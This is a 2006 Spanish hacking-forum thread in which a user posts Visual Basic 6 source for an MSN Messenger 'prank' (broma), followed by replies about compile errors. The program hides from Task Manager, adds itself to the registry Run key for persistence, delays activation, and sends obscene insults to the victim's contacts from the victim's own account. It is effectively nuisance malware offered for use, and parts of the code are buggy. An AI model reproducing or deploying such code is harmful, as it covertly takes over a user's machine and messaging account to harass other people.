elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [Broma para MSN]: MSN fucker By Hendrix
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [Broma para MSN]: MSN fucker By Hendrix  (Leído 4,741 veces)
Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
[Broma para MSN]: MSN fucker By Hendrix
« en: 28 Febrero 2006, 20:45 pm »

Weno, os dare el kode de un simple programa que e programado en 10 minutitos (lo que hace el aburrimiento..jajajaja  ;D ;D)

Las caracteristikas de este programa son:

- Se ejekuta cada Sesion
- 10 insultos (de Kizar y algunos mios)
- Cambia el Nik del MSN por un insulto
- Envia cada 20 segundos Un mensage a todos los usuarios agregados con un insulto
- No aparece en el Taskmanager
- La activacion es retardada (espera 1 minuto a activarse todo)

Weno, les dejo el kode:

Código:
Option Explicit
Public WithEvents MSN As MessengerAPI.Messenger
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer
Dim Men As String, Palabra As Long
Dim KeyResult As String
Dim contactos As MessengerAPI.IMessengerContact
Dim user As IMessengerContact
Dim I As Integer





Private Sub Form_Load()
On Error Resume Next
App.TaskVisible = False
Dim Hendrix
Set MSN = New MessengerAPI.Messenger
Set Hendrix = CreateObject("WScript.Shell")
Hendrix.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Win32", App.Path & "\" & App.EXEName & ".exe"
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
Palabra = Int((Rnd * 10) + 1)
Select Case Palabra
Case 1
        Men = "k te jodan!!"
Case 2
        Men = "Idiota"
Case 3
        Men = "Hijo de p**a"
Case 4
        Men = "Me cago en tu p**a madre"
Case 5
        Men = "Cabron"
Case 6
        Men = "Me la kieres chupar???"
Case 7
        Men = "Me cago en la p**a zorra de tu madre"
Case 8
        Men = "Me cago en tus muertos!!!!"
Case 9
        Men = "Hijo de la gran p**a!!!!"
Case 10
        Men = "La zorra mas grande del planeta??? TU p**a MADRE!!!!"
End Select

KeyResult = GetAsyncKeyState(13)
    If KeyResult = -32767 Then
         SendKeys Men & "{enter}"
    End If

MSN.OptionsPages 0, MOPT_GENERAL_PAGE
SendKeys (Text1.Text & "{ENTER}")



End Sub

Private Sub Timer2_Timer()
On Error Resume Next
For Each user In MSN.MyContacts

If contactos.Status = MISTATUS_ONLINE Then
List1.AddItem contactos.SigninName
End If

For I = 0 To List1.ListCount - 1
MSN.InstantMessage List1.List(I)
SendKeys (" Kieres follar konmigo?? Soy un kapullo!!!! [Infectado kon un programa de Hendrix] ")
SendKeys ("{ENTER}")
Next
Next

End Sub

Private Sub Timer3_Timer()
On Error Resume Next
Timer1.Enabled = True
Timer2.Enabled = True
End Sub

Tienen que agregar esto:

1 Textbox
1 Listbox
3 Timers

Y ya sta, si ven algun error posteadlo...

Salu2

Hendrix



En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
Robokop


Desconectado Desconectado

Mensajes: 1.660



Ver Perfil
Re: [Broma para MSN]: MSN fucker By Hendrix
« Respuesta #1 en: 28 Febrero 2006, 22:35 pm »

la api de messenger esta mal , no señalaste que referencias necestia

depura todos los errores corrijelos y luego lo posteas bien  ;D


En línea

Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: [Broma para MSN]: MSN fucker By Hendrix
« Respuesta #2 en: 1 Marzo 2006, 00:55 am »

 :o :o :o en donde esta el error????

Lo e mirado y no lo veo... :-\ :-\ :-\

Weno, lo repasare...

Salu2

Hendrix

En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
BriaNUR

Desconectado Desconectado

Mensajes: 85



Ver Perfil WWW
Re: [Broma para MSN]: MSN fucker By Hendrix
« Respuesta #3 en: 1 Marzo 2006, 04:08 am »

lo que dice robokop es verdad, me sale un error cuando lo voy a compilar.
En línea

Robokop


Desconectado Desconectado

Mensajes: 1.660



Ver Perfil
Re: [Broma para MSN]: MSN fucker By Hendrix
« Respuesta #4 en: 1 Marzo 2006, 04:33 am »

Citar
public WithEvents MSN As MessengerAPI.Messenger
aqui esta el error estas seguro que tu hiciste el programa ?¿???
y tambien si vas a usar el messenger para aplicaciones Debes de escribir que referencias necesita o que librerias
En línea

Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: [Broma para MSN]: MSN fucker By Hendrix
« Respuesta #5 en: 1 Marzo 2006, 12:02 pm »

Las referencias ya las agregue, el kode que me as mostrado es de un Texto de Buskapina, pero ahora lo korrijo... ;) ;) ;)

Salu2

Hendrix

En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: [Broma para MSN]: MSN fucker By Hendrix
« Respuesta #6 en: 1 Marzo 2006, 12:07 pm »

Weno pondre un trozo del texto de buskapina:

Citar
Bueno, antes que nada, crean el proyecto y van a "Proyecto/Referencias" y buscan "Messenger Api Type Library", "Messenger Private Type Library" y "Messenger Type Library". Todo esto teniendo en cuenta que el "Windows Messenger" està instalado

Estas son las referencia a agregar, si lo kompilo asi no me da error... :-\ :-\ :-\

Salu2

Hendrix

En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
hackpsycho


Desconectado Desconectado

Mensajes: 391



Ver Perfil
Re: [Broma para MSN]: MSN fucker By Hendrix
« Respuesta #7 en: 1 Marzo 2006, 16:55 pm »

Me sale error al momento de querer cargar las referencias pork sera??
En línea


Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: [Broma para MSN]: MSN fucker By Hendrix
« Respuesta #8 en: 1 Marzo 2006, 19:57 pm »

La verdad, no veo el error....

Help plis... ;) ;) ;)

Enga, Salu2

Hendrix

En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
xXnewbieXx

Desconectado Desconectado

Mensajes: 68



Ver Perfil
Re: [Broma para MSN]: MSN fucker By Hendrix
« Respuesta #9 en: 1 Marzo 2006, 22:35 pm »

mmm a lo mjor mi pregunta es stupida no c, d toas formas pregunto y asi aprendo en caso d estar ekivokado.
Para q quieres el 3er timer? veo k pones los otros 2 en enabled, pero si lo pones en las propiedades no seria lo mismo?
salu2 y en caso d ekivokarme perdonen!
En línea

Hardware: Lo que golpeas. Software: La causa

Error 943 - El sistema esta funcionando demasiado bien, se caerá para seguir con la rutina...
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Broma para gastarle a alguien que te cae muy mal
Foro Libre
crazykenny 1 2,048 Último mensaje 19 Marzo 2012, 22:28 pm
por anonimo12121
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines